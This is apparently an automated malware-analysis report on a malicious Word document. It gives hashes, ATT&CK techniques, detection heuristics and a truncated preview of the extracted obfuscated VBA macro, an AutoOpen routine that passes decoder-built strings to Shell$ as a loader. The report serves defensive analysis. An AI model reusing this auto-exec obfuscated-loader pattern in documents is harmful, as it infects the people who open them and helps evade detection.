Office (OLE) malware analysis — malicious · bbce7972501609e4

MALICIOUS

Office (OLE)

223.5 KB Created: 2017-11-17 13:03:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: cef1e14531119c090b3259741f19b1ac SHA-1: 20e533c9131c735d138bd9d2e086aa2f669b21fb SHA-256: bbce7972501609e4d640ab6034b06e9ca903f89841e56e21362f9ec690741337

304 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro utilizes the Shell() function, a critical heuristic firing, to execute a command. This indicates the document's primary purpose is to act as a loader for a second-stage payload, likely downloaded from an external source.

Heuristics 9

ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	273398 bytes
SHA-256: `aac56f1a51b9df02a09b09a9e9e3504ae0b3cee7d30c865f39bb1e94242b3b65`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 96 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jrwUwahWn" Sub AutoOpen() PUfwEHTGH = "KfndMSUGs" + "LkpwlfVTR" + "vCDStKRcG" + "OODFnMBqr" Shell$ AnoPjLrLR, 0 cmqPTGjqF = "STizdlqYD" + "DrldMjMFr" + "oGwcuvosj" + "bfiwmCFwJ" End Sub Function AnoPjLrLR() JNBCVPwUOU = "5Hi7qaBHsUjmwZFiPwzzwQC7" GuVDzoIQpZ = Mid(JNBCVPwUOU, 7, 13) IwDtbNuUiL = Array("EWOMOEJb", "pGiJFnJn", "bFwwvPqw", "FPwizLXC", "bqdLpibb") wXKnNMAsiR = Array("ZXcMNOlH", "CzzwsdGp", "jQGzHiid", "jfhPKzwt", "dVXXndkq") mwIjwiwUlX = Array("doczMYKw", "kofZbcTv", "twdijWzE", "BFUWFiBC", "fPVTBjQK") qYVMElrQMVN = "koWuEDcGVGhEBuMvzdVVwrGMkqFrSrYDVzmJtXVKntlmtmiQTPYRGvmfcamfDkniiijEHCCbHLhCFUTwLpYDSGwZKHhSlpGDGHDODaJAq6a24lrwRbF" UiDFkOlM = Mid(qYVMElrQMVN, 7, 97) IWzHj = Array("VjfWSYSB", "CcioACJH", "rYwHEnsB", "mctLGztM", "hTMzramc") lDWXZV = Array("nTUdDMCd", "FOcdkJGh", "rdjpfGuC", "iSHjpMPQ", "mTUkTOzZ") XujquqwV = Array("aPFsXQcY", "NiFOrwwj", "ZRulFVos", "wLrQpVOc", "fKPQABiS") qzoFuK = "QlwqIrj9zfWqiLTGvakzQmvzblKZLiPaXwqzJR83W9V8qmP" VtUuQk = Mid(qzoFuK, 9, 29) waBptrOuLPR = Array("pjTKHBZp", "WnKBUMUE", "bNtMZLir", "QdihhjjX", "nbvWCdlz") psOlZPqIY = Array("mBtCLMHT", "qKonHSti", "ActiSrHp", "GmOsQzBz", "bwZXRjjE") lAzFkTis = Array("VPrWrtQU", "hRVakHiu", "tEvYwOCs", "IrLLtWMU", "vpIDAlzN") fZcWVpBpnGv = "SAh3NQqDICuk6UAJJmldbRqSwjiTPklmnvUzVYHKZclDmW6KiWS" SzddBm = Mid(fZcWVpBpnGv, 14, 33) iuicKcp = Array("WtLwcbMT", "SidNkHFG", "MwNAhEbL", "FBiuwatI", "GiBEDEQh") MpkTLb = Array("frsOswkn", "jCqCXzfR", "SztbwSVr", "lVHBGBCI", "ijUpMNSG") kOdRkFBqtHC = Array("QqKwjrkI", "CjmDKokN", "WAcXrihi", "ziTrcpFE", "hmKGHYIt") rVmCIR = "vcWq7q6AsioRpZzvrBofGisjDCMplaROlwJauzHPaJVUdAkpRWQJlTwvqAwzsdfcuwjrQZBtuZFzMXGDSWYOKIdSCNktzJWFLBMIRiLEa2XQT1wWDrr" XCwmSLXEcL = Mid(rVmCIR, 12, 84) qTTAwKvjjc = Array("kwwWPwzt", "vHTLkuOi", "JcwBYtfM", "ihWYiiFz", "sintjLTA") rwIaJCKq = Array("kZvVWuUm", "XbwicGVq", "TlsicZPR", "BVSBHVzw", "JvQwwKqj") rlwLiYcwoM = Array("MkAChaVm", "NwZzTkYL", "KdTBbSiB", "cwVjqXsI", "vIVrYMjb") LnNjQCn = "IY1WCQf9tUvcPudXlQ3SYCsDzwqPFVtmHKYfSUVtDlrcVnljIabJwVSwoOZRQdwjXBBkXFPzdavOzYMZdJHftkolrZrEuDcaoLFUmAJCKcfXZDwQCAoHVQmnNPtzNLEazVaoSsmdzEUREQMnbaBtOVEXZSGWHLpzYFaEdKzJOLHRwViwD3JGK8ZZ73jn0" XYzFmsE = Mid(LnNjQCn, 27, 151) wPshhYzvHkM = Array("zjoLvBfY", "XFnUroIu", "FwaiFpvq", "DRBKPhmw", "usCviTGa") GpRTSjIGY = Array("TzJljYRH", "AamZlAVJ", "kwHiAUIp", "SpawmMQl", "sAPHjKGi") hChsuBitEi = Array("zuKouNNt", "WsKfLbaz", "oTTuwSUn", "KAhllOdZ", "rcfGJTvE") ivNOfiGPRz = "9wGJi8iw0J2E9qpXwDShrfswwiATXsjWpYitSkbIHDADnliaDzjmjapDaSnCmUXcQwijjfJAcdPnfoILEZPXvroH" ctVPG = Mid(ivNOfiGPRz, 21, 63) CMbjMuC = Array("cjcuCkZR", "aPSNrMjj", "ZXitfbHI", "PkojwTpV", "XOSRqaka") wucSQ = Array("bQLVvPif", "wwjmpBZA", "YUiRwqUG", "ZzpduOqw", "mESPQmMz") bqzIvFKAIz = Array("CImwnDfW", "oRsVvTdk", "vFvzaElh", "HhzliJjm", "HfPnDWSW") lhtzbFzRspu = "RSME7AiABcJhbUBsvTEsjdVQGhOZqpHkdvAmWbRfJjbOzjwPqYXGvauAkmOGknQiWODfTPVUCYjzCGRZjwiSSBoDBACjMLvWSzsldSvbCCEXqzwdVpXlEwMUaziTNmIrdNiEOfvRDHQPwRNEBYNXnJRUkYLinbOQuNXvU3spM1K0c8XqXWLdTTL74ZX" BSUUwPwEZRz = Mid(lhtzbFzRspu, 12, 151) RjdZwP = Array("RSocVVDT", "ahULqPZw", "XFqFEunf", "iGOQDqjY", "mZfHPILm") PnMvGlzZ = Array("ifLAoYws", "GRPwfNSX", "fJuPGmPj", "BvZQjRiO", "uEaYimqJ") cUDXZ = Array("JVJmaisZ", "HIcGOvfr", "QbzszfJo", "iBEbmtos", "SkFkdcIS") VdSfHpWN = "vsboBjjOwvczwKzrCuGZzWZzUlCLLjDrnGiWFAdptNVzWjWpjqNujwqJmcUQhUCMrlKrbbmCRRjmBbdkPMjOaVW8KUKkca" wqpcFOboK = Mid(VdSfHpWN, 3, 80) uqnUqaUp = Array("DzJapbAw", "YiIGmzKi", "MUEZiRmN", "TjoipuOn", "ShpzVizH") ZGPdiEwa = Array("AFCDlhFU", "ZbYIYjnl", "NwHGmVIi", "UUnFILIi", "VwYZOjbl") uAQMW = Array("dUEOWGOj", "tEmZatUf", "wYjQuAMO", "StmcKOXd", "UWcSRuHO") nXuJJ = "wlDDPTOh7iKXro3fEWwEtJmGimiGzNGdduuswHwqzFIVnLrtjpGHCcazENMFjDmzHVJmRGbkrvaZBQTSukXKGwaBUw ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.